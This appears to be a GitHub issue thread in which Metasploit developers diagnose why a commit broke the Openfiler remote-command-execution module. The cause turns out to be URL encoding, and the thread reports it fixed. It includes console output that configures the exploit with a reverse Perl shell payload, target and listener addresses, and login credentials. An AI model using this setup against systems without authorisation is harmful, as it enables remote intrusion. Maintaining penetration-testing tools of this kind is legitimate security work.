Commit "da0a9f66ea93307cf2985dab3f75cf5611932cc8" breaks module "exploit/linux/http/openfiler_networkcard_exec"

[jnesta]

Hello team - this bug is for the openfiler Metasploit module. For reference, here is the the official documentation page on the module and here is the Github page for it.

This commit by FireFart on May 25, 2014 appears to break the code.

To test, I am using a VM with Openfiler on it. The version is "Openfiler NSA (32-bit PAE)" (as reported in "/etc/distro-release").

In Metasploit, I load the payload "use exploit/linux/http/openfiler_networkcard_exec" and then use a payload of "cmd/unix/reverse_perl".

In my testing, versions of the code prior to this commit will work just fine and receive the remote shell. And versions of the code after this commit will fail. With someone who only has a passing familiarity with Metasploit module code, I'm not sure why this is.

Let me know if you need additional information, but I'm thinking this should be easy enough to reproduce. ;)

[wchen-r7]

Is there a backtrace?

[firefart]

@wchen-r7 maybe the cmd parameter is URL encoded by send_request_cgi and wasn't in the url parameter?

[wchen-r7]

Yeah, that would be the only difference between the two commits. Need to actually download the vulnerable software and test to make sure.

[firefart]

@wchen-r7 if that's the case, we should add the encode_params false parameter to all relevant changes from this commit

da0a9f6#diff-b612aa6abe8a5e3a476e47624acd3879L99

da0a9f6#diff-e26c2f019a718e3d7f48f7cebb0e38cbR57

da0a9f6#diff-d57f0cc27754363db4b9549ba907f31aR77

[wchen-r7]

Good to know, thanks!

[jnesta]

wchen-r7 - There is no backtrace. Here is a copy paste of what happens when it fails:

msf exploit(openfiler_networkcard_exec) > show options

Module options (exploit/linux/http/openfiler_networkcard_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  Th1si$sXuR3      yes       The password for the application
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST     10.1.3.120       yes       The target address
   RPORT     446              yes       The target port
   SSL       true             yes       Use SSL
   USERNAME  openfiler        yes       The username for the application
   VHOST                      no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.16.19.3       yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(openfiler_networkcard_exec) > exploit

[*] Started reverse handler on 10.16.19.3:4444 
[*] 10.1.3.120:446 - Sending payload (229 bytes)
[+] 10.1.3.120:446 - Payload sent successfully
msf exploit(openfiler_networkcard_exec) > 

As you can see, the Metasploit prompt is returned with no shell (as opposed to coming back with no prompt at all, which is what the reverse Perl shell does.

[wchen-r7]

Ok I see. Thanks. Sounds like encoding is a possible root cause.

[firefart]

@jnesta if you use the git version and update the master branch, the module should be working again

[jnesta]

Yes, the latest version of the code works again. Thanks guys!